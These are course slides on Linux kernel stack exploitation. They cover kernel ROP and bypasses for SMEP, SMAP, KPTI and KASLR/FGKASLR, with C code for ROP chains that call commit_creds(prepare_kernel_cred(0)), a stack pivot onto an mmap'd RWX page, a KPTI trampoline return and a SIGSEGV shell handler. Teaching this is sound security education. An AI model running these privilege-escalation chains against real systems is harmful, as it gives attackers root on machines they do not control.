ENPM809V

Kernel Hacking - Stack Part 2

Agenda

  • Kernel ROP
  • Bypassing SMEP/SMAP in depth
  • Bypassing KPTI in depth
  • Bypass KASLR and FGKASLR

Kernel ROP

What is it?

  • Kernel ROP is exactly the same as user-space ROP.
    • Except we are ropping within the kernel
  • The same exact principals apply - we are attempting to utilize the ret instruction to jump to snippets of code.

What is it?

  • Instead of jumping to Gadgets within the binary or within LIBC, we are utilizing the Kernel!
    • The entire kernel is fair game for us as long as we have access to it (meaning if it's part of the core kernel or a module that's loaded in).
  • Caveat

Caveat

  • The gadgets need to be in executable memory!
  • Let's figure out how we can actually find some gadgets.

Caveat

Let's say we don't have KASLR enabled, where can we find these addresses?

SMEP Enabled

Review of SMEP...

  • SMEP is protecting against execution of code stored in userspace when in kernel mode.
    • Kernel cannot trust code stored in userspace virtual memory
    • Hardware implemented (the 20th bit of the CR4 register determines if SMEP is on/off)
  • Anytime code stored in userspace gets executed, the CPU will block it.

Review of SMEP...

  • Not 100% full-proof
    • We can still read from and write to userspace pages!
      • Copy a ROP chain from userspace??????
    • We still have all userspace and kernelspace memory under one page table
      • KPTI protection not enabled

How can we exploit?

  • Not 100% full-proof
    • We can still read from and write to userspace pages!
      • Copy a ROP chain from userspace??????
    • We still have all userspace and kernelspace memory under one page table
      • KPTI protection not enabled

How can we exploit?

  • We will a build a kernel ROP chain
    • padding
    • stack-cookie
    • overwrite stored RBP
    • prepare_kernel_cred
    • commit_creds
    • swapgs
    • iretq
    • store userrip, usercs, userrflags, usersp, and userss in that order on the stack

How can we exploit?

  • Issues with this:
    • When findiing ROPGadgets, not all ROPGadgets in the kernel are going to be usable.
    • Therefore, you are likely going to have to search and use something a bit more complicated.
      • Must be in executable kernel memory.

Example:

unsigned long user_rip = (unsigned long)get_shell;

unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long pop_rdx_ret = 0xffffffff81007616; // pop rdx ; ret
unsigned long cmp_rdx_jne_pop2_ret = 0xffffffff81964cc4; // cmp rdx, 8 ; jne 0xffffffff81964cbb ; pop rbx ; pop rbp ; ret
unsigned long mov_rdi_rax_jne_pop2_ret = 0xffffffff8166fea3; // mov rdi, rax ; jne 0xffffffff8166fe7a ; pop rbx ; pop rbp ; ret
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs ; pop rbp ; ret
unsigned long iretq = 0xffffffff8100c0d9;

void overflow(void){
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16;
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp
    payload[off++] = pop_rdi_ret; // return address
    payload[off++] = 0x0; // rdi <- 0
    payload[off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
    payload[off++] = pop_rdx_ret;
    payload[off++] = 0x8; // rdx <- 8
    payload[off++] = cmp_rdx_jne_pop2_ret; // make sure JNE doesn't branch
    payload[off++] = 0x0; // dummy rbx
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = mov_rdi_rax_jne_pop2_ret; // rdi <- rax
    payload[off++] = 0x0; // dummy rbx
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
    payload[off++] = swapgs_pop1_ret; // swapgs
    payload[off++] = 0x0; // dummy rbp
    payload[off++] = iretq; // iretq frame
    payload[off++] = user_rip;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));

    puts("[!] Should never be reached");
}

Other issues:

  • In the kernel, sometimes your stack is not big enough to hold the entire ROP chain
  • Because SMAP is not enabled, we can mmap a region of RWX memory in userspace, then change RSP to point to that region of memory.

Stack Pivoting:

  • How can we do this?
    • We first need to find an executable gadget that lets us change RSP somehow.
      • Example: this modifies RSP to be 0x5b000000
      • Remember - if you do mov esp, it modifies the lower 32 bits and zeroes the upper 32 bits
unsigned long mov_esp_pop2_ret = 0xffffffff8196f56a; // mov esp, 0x5b000000 ; pop r12 ; pop rbp ; ret

Stack Pivoting:

void build_fake_stack(void){
    fake_stack = mmap((void *)0x5b000000 - 0x1000, 
    	0x2000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED,
        -1,
        0);
    unsigned off = 0x1000 / 8;
    fake_stack[0] = 0xdead; // put something in the first page to prevent fault
    fake_stack[off++] = 0x0; // dummy r12
    fake_stack[off++] = 0x0; // dummy rbp
    fake_stack[off++] = pop_rdi_ret;
    ... // the rest of the chain is the same as the last payload
}

void overflow(void)
{
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off = 16;
    payload[off++] = cookie;
    payload[off++] = 0x0; // rbx
    payload[off++] = 0x0; // r12
    payload[off++] = 0x0; // rbp
    payload[off++] = mov_ebp_5b000000; // return address    
}

I noticed something...

  • Why 0x5b000000-0x1000:
    • This allows the stack to grow. Functions like prepare_kernel_cred and commit_creds make calls to other functions causing the stack to grow
  • Why did I put 0xdead at fake_stack[0]
    • This is because if we don't do this, we will create a double fault.
    • We put the ROP chain in the second page (based on where we set the default offset) so no double fault there!

SMAP Enabled

Hardest So Far!

  • With SMAP, we no longer have read/write access to userspace.
    • This means that we cannot do stack pivoting in order to perform our ROP Chain!

What does this mean

  • You have a couple of options:
    • Figure out a way to overwrite the values in the CR4 register to turn off SMEP/SMAP (which is significantly harder to do in newer kernels)
      • Patch was made in Linux Kernel 5.3 to native_write_cr4
    • Utilize the stack that we have to craft our exploit!

Why is overwriting CR4 harder in newer kernels?

// From https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#references

uint64_t user_cs, user_ss, user_rflags, user_sp;

uint64_t user_rip = (uint64_t) spawn_shell;

void privilege_escalation() {
    uint8_t sz = 35;
    uint64_t payload[sz];
    payload[cookie_off++] = cookie;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = 0x0;
    payload[cookie_off++] = pop_rdi_ret;
    payload[cookie_off++] = 0x0;	// Set up gfor rdi=0
    payload[cookie_off++] = prepare_kernel_cred; // prepare_kernel_cred(0)
    payload[cookie_off++] = mov_rdi_rax_clobber_rsi140_pop1; // save ret val in rdi
    payload[cookie_off++] = 0x0; //compensate for extra pop rbp
    payload[cookie_off++] = commit_creds; // commit_creds(rdi)
    payload[cookie_off++] = swapgs_pop1_ret;
    payload[cookie_off++] = 0x0;  // compensate for extra pop rbp
    payload[cookie_off++] = iretq;
    payload[cookie_off++] = user_rip; // Notice the reverse order ...
    payload[cookie_off++] = user_cs; // compared to how ...
    payload[cookie_off++] = user_rflags; // we returned these ...
    payload[cookie_off++] = user_sp; // in the earlier ...
    payload[cookie_off++] = user_ss; // exploit :)

    uint64_t data = write(global_fd, payload, sizeof(payload));

    puts("[!] If you can read this we failed the mission :(");
}

int main(int argc, char** argv) {
    open_dev();
    leak_cookie();
    save_state();
    write_ret();
}

KPTI Enabled

What does this do?

  • Separate User-Space and Kernel-Space page tables entirely!
  • We can no longer strictly just use swapgs and iretq to get back to userspace.

How do we bypass?

  • Method 1: we can use a signal handler.
    • When the kernel sends SIGSEGV, we transfer execution back to the user!
    • In the signal handler, we can call execve("/bin/sh", 0, 0)
    • Takes care of the work for us!
  • Method 2: swapgs+KPTI trampoline.
    • The KPTI trampoline is the traditional way of transfering page tables. Then we call swapgs and iretq
      • Sometimes a ROP Gadget can have all of these instructions for us

How do we bypass?

  • Method 3 - Utilizing Modprobe
    • For this method we need to disguise our shellcode as a kernel module.
    • We store it somewhere in the filesystem
    • Then we overwrite modprobe_path (when we execute call_modprobe)
      • This is the first parameter

How do we bypass?

cat /proc/kallsyms | grep swapgs_restore_regs_and_return_to_usermode
-> ffffffff81200f10 T swapgs_restore_regs_and_return_to_usermode

How do we bypass?

 is what the start of the function looks like:

.text:FFFFFFFF81200F10                 pop     r15
.text:FFFFFFFF81200F12                 pop     r14
.text:FFFFFFFF81200F14                 pop     r13
.text:FFFFFFFF81200F16                 pop     r12
.text:FFFFFFFF81200F18                 pop     rbp
.text:FFFFFFFF81200F19                 pop     rbx
.text:FFFFFFFF81200F1A                 pop     r11
.text:FFFFFFFF81200F1C                 pop     r10
.text:FFFFFFFF81200F1E                 pop     r9
.text:FFFFFFFF81200F20                 pop     r8
.text:FFFFFFFF81200F22                 pop     rax
.text:FFFFFFFF81200F23                 pop     rcx
.text:FFFFFFFF81200F24                 pop     rdx
.text:FFFFFFFF81200F25                 pop     rsi
.text:FFFFFFFF81200F26                 mov     rdi, rsp
.text:FFFFFFFF81200F29                 mov     rsp, qword ptr gs:unk_6004
.text:FFFFFFFF81200F32                 push    qword ptr [rdi+30h]
.text:FFFFFFFF81200F35                 push    qword ptr [rdi+28h]
.text:FFFFFFFF81200F38                 push    qword ptr [rdi+20h]
.text:FFFFFFFF81200F3B                 push    qword ptr [rdi+18h]
.text:FFFFFFFF81200F3E                 push    qword ptr [rdi+10h]
.text:FFFFFFFF81200F41                 push    qword ptr [rdi]
.text:FFFFFFFF81200F43                 push    rax
.text:FFFFFFFF81200F44                 jmp     short loc_FFFFFFFF81200F89
.text:FFFFFFFF81200F89 loc_FFFFFFFF81200F89:
.text:FFFFFFFF81200F89                               pop     rax
.text:FFFFFFFF81200F8A                               pop     rdi
.text:FFFFFFFF81200F8B                               call    cs:off_FFFFFFFF82040088
.text:FFFFFFFF81200F91                               jmp     cs:off_FFFFFFFF82040080
...
.text.native_swapgs:FFFFFFFF8146D4E0                 push    rbp
.text.native_swapgs:FFFFFFFF8146D4E1                 mov     rbp, rsp
.text.native_swapgs:FFFFFFFF8146D4E4                 swapgs
.text.native_swapgs:FFFFFFFF8146D4E7                 pop     rbp
.text.native_swapgs:FFFFFFFF8146D4E8                 retn
...
.text:FFFFFFFF8120102E                               mov     rdi, cr3
.text:FFFFFFFF81201031                               jmp     short loc_FFFFFFFF81201067
...
.text:FFFFFFFF81201067                               or      rdi, 1000h
.text:FFFFFFFF8120106E                               mov     cr3, rdi
...
.text:FFFFFFFF81200FC7                               iretq

How do we bypass?

void overflow(void){
    // ...
    payload[off++] = commit_creds; // commit_creds(prepare_kernel_cred(0))
    payload[off++] = kpti_trampoline; // swapgs_restore_regs_and_return_to_usermode + 22
    payload[off++] = 0x0; // dummy rax
    payload[off++] = 0x0; // dummy rdi
    payload[off++] = user_rip;
    payload[off++] = user_cs;
    payload[off++] = user_rflags;
    payload[off++] = user_sp;
    payload[off++] = user_ss;
    // ...
}

Bypassing via Signals

  • Instead of modifying our shellcode to add in the KPTI trampoline, we keep our shellcode from the SMEP/SMAP and register a signal handler

Bypassing via Signals

  • Instead of modifying our shellcode to add in the KPTI trampoline, we keep our shellcode from the SMEP/SMAP and register a signal handler
void spawn_shell() {
	/* Same as before as we're already back in user-land
    *  when this gets executed so SMEP/SMAP won't interfere
    */
}

struct sigaction sigact;

void register_sigsegv() {
    puts("[+] Registering default action upon encountering a SIGSEGV!");
    sigact.sa_handler = spawn_shell;
    sigemptyset(&sigact.sa_mask);
    sigact.sa_flags = 0;
    sigaction(SIGSEGV, &sigact, (struct sigaction*) NULL);
}

int main(int argc, char** argv) {
	register_sigsegv();
    open_dev();
    leak_cookie();
    save_state();
    write_shellcode(); // This does our commit_creds(prepare_kernel_creds(0))
}

Bypassing via Signals

  • Instead of modifying our shellcode to add in the KPTI trampoline, we keep our shellcode from the SMEP/SMAP and register a signal handler
void spawn_shell() {
	/* Same as before as we're already back in user-land
    *  when this gets executed so SMEP/SMAP won't interfere
    */
}

struct sigaction sigact;

void register_sigsegv() {
    puts("[+] Registering default action upon encountering a SIGSEGV!");
    sigact.sa_handler = spawn_shell;
    sigemptyset(&sigact.sa_mask);
    sigact.sa_flags = 0;
    sigaction(SIGSEGV, &sigact, (struct sigaction*) NULL);
}

int main(int argc, char** argv) {
	register_sigsegv();
    open_dev();
    leak_cookie();
    save_state();
    write_shellcode(); // This does our commit_creds(prepare_kernel_creds(0))
}

Using modprobe()

  • We are going to reference some outside resource for this.
  • Why?
  • Show you how I learn new concepts and begin to implement them.

KASLR

What is it?

  • Randomizes addresses in the stack
  • This is the exact same concept as userspace ASLR except it is in the kernel and affects
  • What does it randomize?
    • Stack Addresses
    • Data Addresses
    • Function Addresses

FGKASLR - KASLR on Steroids

  • This is even more granular KASLR
  • Randomizes the offsets of various memory addresses, not just the base address
    • Functions are not always the same offset from its base
  • Significantly more difficult to exploit reliably!

Doesn't Randomize Everything

  • There is still __randomize_layout to randomize kernel fields.

How are we going to bypass KASLR?

  • This requires a leak! We need to figure out the address behind the functions we want to use
    • In this case prepare_kernel_cred() and commit_creds()
  • We then can use the same exact exploit as before to actually craft our ROP Chain.

What about FGKASLR?

  • This is a little bit trickier, but we are still in luck!
    • Not every function is randomized!
    • The KPTI trampoline and mod_probe are not affected by it!
  • We can also get the functions we want by parsing the ksymtab!
    • The ksymtab function stores the offset of the function in a kernel_symbol struct.
    • Generated as a linker flag: 

      EXPORT_SYMBOL(my_function);

       

What about FGKASLR?

From: https://0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/#references

What this means?

  • You got two paths to exploitation
    • Abuse modprobe
    • Modify your commit_creds(prepare_kernel_cred(0)) exploit
      • Instead of getting the address directly of the functions (from calculating offset or /proc/kallsyms), you are going to want to get it from  __ksymtab_function->value_offset
        • You are still going to need to figure out the base address of all the functions in order to do this, but it will always be at the same offset per kernel version

Alternative Approach

  • Use the Modprobe_path exploit
    • modprobe_path is not affect by FG-KASLR

Continued Learning

Working Through ModProbe_Path

  • 0x434b.dev/dabbling-with-linux-kernel-exploitation-ctf-challenges-to-learn-the-ropes/ 
    • Shows how to do it and craft exploits that will dump /proc/kallsyms

Kernel Hacking - Stack Part 2

By Ragnar Security

Kernel Hacking - Stack Part 2

  • 166